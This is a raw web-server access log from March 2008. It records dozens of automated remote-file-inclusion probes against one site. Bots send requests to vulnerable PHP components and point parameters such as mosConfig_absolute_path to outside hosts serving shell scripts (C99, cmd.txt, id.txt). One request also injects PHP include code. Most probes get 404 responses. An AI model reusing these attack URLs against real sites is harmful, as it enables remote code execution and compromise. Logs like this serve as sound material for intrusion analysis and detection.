83.19.144.26 - - [16/Mar/2008:08:41:23 -0700] "GET //login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [16/Mar/2008:08:41:23 -0700] "GET /logs//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:41:25 -0700] "GET /logs/access_080211.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:41:43 -0700] "GET /logs/access_080228.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.144.26 - - [16/Mar/2008:08:41:55 -0700] "GET /logs/access_080117.log//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.169.166.27 - - [16/Mar/2008:08:42:08 -0700] "GET /logs/access_080220.log/modify.php?dir_module=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.84.155.27 - - [16/Mar/2008:08:44:28 -0700] "GET /logs/access_080118.log/index.php?pag=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.51.67.30 - - [16/Mar/2008:08:44:48 -0700] "GET //login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.179.41.165 - - [16/Mar/2008:08:45:02 -0700] "GET //login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.51.67.30 - - [16/Mar/2008:08:45:19 -0700] "GET //login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.246.22.2 - - [16/Mar/2008:08:46:47 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.cv-trabajo.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
64.246.22.2 - - [16/Mar/2008:08:46:47 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.cv-trabajo.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
64.246.22.2 - - [16/Mar/2008:08:46:53 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.246.22.2 - - [16/Mar/2008:08:46:53 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.6.26.13 - - [16/Mar/2008:08:47:15 -0700] "GET /bikes/?N=D HTTP/1.0" 200 2304 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:08:49:01 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:08:49:01 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
62.75.147.34 - - [16/Mar/2008:08:49:18 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://beta.bluesite.communicode.de/scripte/smarty/internals/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.19.144.26 - - [16/Mar/2008:08:49:42 -0700] "GET //login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:50:20 -0700] "GET /logs/access_080228.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:50:20 -0700] "GET //components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:50:20 -0700] "GET /logs//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:50:39 -0700] "GET /logs/access_080211.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.208.16.41 - - [16/Mar/2008:08:50:42 -0700] "GET /logs/access_071228.log//component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.25 - - [16/Mar/2008:08:50:42 -0700] "GET /logs/access_071228.log//component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.41 - - [16/Mar/2008:08:50:42 -0700] "GET //component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.25 - - [16/Mar/2008:08:50:42 -0700] "GET //component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.41 - - [16/Mar/2008:08:50:42 -0700] "GET /logs//component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.25 - - [16/Mar/2008:08:50:42 -0700] "GET /logs//component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.25 - - [16/Mar/2008:08:50:49 -0700] "GET /logs/access_080228.log//component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.86.119 - - [16/Mar/2008:08:51:08 -0700] "GET /logs/access_071229.log//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.2.252.37 - - [16/Mar/2008:08:51:14 -0700] "GET /index2.php?x=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.2.252.37 - - [16/Mar/2008:08:51:14 -0700] "GET /index2.php?x=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.26.137.64 - - [16/Mar/2008:08:51:30 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [16/Mar/2008:08:51:31 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.105.208.186 - - [16/Mar/2008:08:51:31 -0700] "GET /logs/access_080129.log/main.php?pageURL=http://keesenmirjam.nl/media/C99-S.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [16/Mar/2008:08:51:31 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:08:52:08 -0700] "GET /print.php?page=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.26.137.64 - - [16/Mar/2008:08:52:18 -0700] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
83.136.83.94 - - [16/Mar/2008:08:52:29 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bestlist.t35.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
83.136.83.94 - - [16/Mar/2008:08:52:29 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bestlist.t35.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
67.212.162.98 - - [16/Mar/2008:08:52:45 -0700] "GET //component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.76.163.42 - - [16/Mar/2008:08:53:16 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.drogaembaca.org.br/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.76.163.42 - - [16/Mar/2008:08:53:38 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.drogaembaca.org.br/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
58.26.137.64 - - [16/Mar/2008:08:53:59 -0700] "GET /logs/access_080120.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:08:55:02 -0700] "GET /logs/access_080225.log//index.php?pagina=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.86.119 - - [16/Mar/2008:08:55:03 -0700] "GET //login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:08:55:33 -0700] "GET /logs/access_080225.log/print.php?page=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:08:55:34 -0700] "GET /print.php?page=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:08:55:34 -0700] "GET /logs/print.php?page=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.105.208.186 - - [16/Mar/2008:08:55:40 -0700] "GET /logs/access_080207.log//errors.php?error=http://keesenmirjam.nl/media/C99-S.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [16/Mar/2008:08:55:48 -0700] "GET //errors.php?error=http://keesenmirjam.nl/media/C99-S.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [16/Mar/2008:08:55:52 -0700] "GET /logs//errors.php?error=http://keesenmirjam.nl/media/C99-S.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:08:55:56 -0700] "GET /logs/access_080225.log/index.php?pagina=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.58.242.138 - - [16/Mar/2008:08:56:08 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [16/Mar/2008:08:56:09 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.86.119 - - [16/Mar/2008:08:56:47 -0700] "GET /logs/access_080117.log//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:08:56:52 -0700] "GET /show.php?page=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:08:57:16 -0700] "GET /print.php?page=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:08:58:15 -0700] "GET /logs/access_080126.log//?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:08:58:16 -0700] "GET //?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:08:58:16 -0700] "GET /logs//?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 200 38981 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:08:58:21 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
86.120.117.2 - - [16/Mar/2008:08:58:49 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://parkourbraila.org/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:08:59:02 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:08:59:07 -0700] "GET /logs/access_080215.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.86.119 - - [16/Mar/2008:08:59:11 -0700] "GET /logs/access_080117.log//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.25.160 - - [16/Mar/2008:08:59:36 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/wisnu_amanda/wisnu.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.165.180.214 - - [16/Mar/2008:08:59:54 -0700] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
82.165.180.214 - - [16/Mar/2008:08:59:55 -0700] "GET /logs/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
201.76.163.42 - - [16/Mar/2008:09:00:34 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.drogaembaca.org.br/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
124.217.247.200 - - [16/Mar/2008:09:01:06 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.76.163.42 - - [16/Mar/2008:09:01:18 -0700] "GET /logs/access_080131.log/index.php?pag=http://www.drogaembaca.org.br/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:09:01:23 -0700] "GET /logs/access_080225.log/print.php?page=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:09:01:24 -0700] "GET /print.php?page=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:09:01:24 -0700] "GET /logs/print.php?page=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:09:01:32 -0700] "GET /show.php?page=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.147.34 - - [16/Mar/2008:09:01:35 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://beta.bluesite.communicode.de/scripte/smarty/internals/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:09:01:38 -0700] "GET /logs/access_080122.log//?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.144.26 - - [16/Mar/2008:09:01:43 -0700] "GET /logs/access_071229.log//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [16/Mar/2008:09:01:43 -0700] "GET //login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [16/Mar/2008:09:01:44 -0700] "GET /logs//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.212.162.98 - - [16/Mar/2008:09:02:09 -0700] "GET /logs/access_071228.log//component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.162.98 - - [16/Mar/2008:09:02:09 -0700] "GET /logs//component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.162.98 - - [16/Mar/2008:09:02:15 -0700] "GET /logs/access_080228.log//component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.19.144.26 - - [16/Mar/2008:09:02:17 -0700] "GET /logs/access_080117.log//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:09:02:26 -0700] "GET /logs/prepare.php?xcart_dir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.79.236.170 - - [16/Mar/2008:09:02:40 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.congressovirtualmgf.com/includes/js/calendar/lang/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
124.217.247.200 - - [16/Mar/2008:09:03:17 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.94.129.206 - - [16/Mar/2008:09:03:18 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://beta.bluesite.communicode.de/scripte/smarty/internals/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.25 - - [16/Mar/2008:09:03:24 -0700] "GET /logs/access_080201.log//component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.25 - - [16/Mar/2008:09:03:24 -0700] "GET //component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.25 - - [16/Mar/2008:09:03:24 -0700] "GET /logs//component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.25 - - [16/Mar/2008:09:03:30 -0700] "GET /logs/access_080101.log//component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:09:03:54 -0700] "GET /logs/access_080228.log/show.php?page=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:09:03:54 -0700] "GET /show.php?page=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:09:03:54 -0700] "GET /logs/show.php?page=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:09:04:05 -0700] "GET /prepare.php?xcart_dir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.85.114.4 - - [16/Mar/2008:09:04:22 -0700] "GET /logs/access_080225.log//index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [16/Mar/2008:09:04:26 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.84.148.43 - - [16/Mar/2008:09:04:49 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Validator.php.php?mosConfig_absolute_path=http://course-notes.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
88.84.148.43 - - [16/Mar/2008:09:04:49 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Validator.php.php?mosConfig_absolute_path=http://course-notes.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
193.242.108.82 - - [16/Mar/2008:09:06:40 -0700] "GET //classes/core/sanitize.php?rootdir=http://course-notes.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
193.242.108.82 - - [16/Mar/2008:09:06:40 -0700] "GET /logs//classes/core/sanitize.php?rootdir=http://course-notes.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:09:06:41 -0700] "GET /logs/access_080131.log/show.php?page=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.92.172.194 - - [16/Mar/2008:09:06:44 -0700] "GET /logs/access_080201.log//?mosConfig_absolute_path=http://74.54.207.2/~cogu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.92.172.194 - - [16/Mar/2008:09:06:44 -0700] "GET //?mosConfig_absolute_path=http://74.54.207.2/~cogu/id.txt??? HTTP/1.1" 200 3094 "-" "libwww-perl/5.808" "www.dmulk.com"
64.92.172.194 - - [16/Mar/2008:09:06:44 -0700] "GET /logs//?mosConfig_absolute_path=http://74.54.207.2/~cogu/id.txt??? HTTP/1.1" 200 38981 "-" "libwww-perl/5.808" "www.dmulk.com"
64.92.172.194 - - [16/Mar/2008:09:06:48 -0700] "GET /logs/access_080215.log//?mosConfig_absolute_path=http://74.54.207.2/~cogu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.105.208.186 - - [16/Mar/2008:09:06:52 -0700] "GET /logs/access_080126.log//login.php?dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [16/Mar/2008:09:06:55 -0700] "GET //login.php?dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [16/Mar/2008:09:07:05 -0700] "GET /logs//login.php?dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.37.83.253 - - [16/Mar/2008:09:07:24 -0700] "GET / HTTP/1.1" 200 3094 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "dmulk.com"
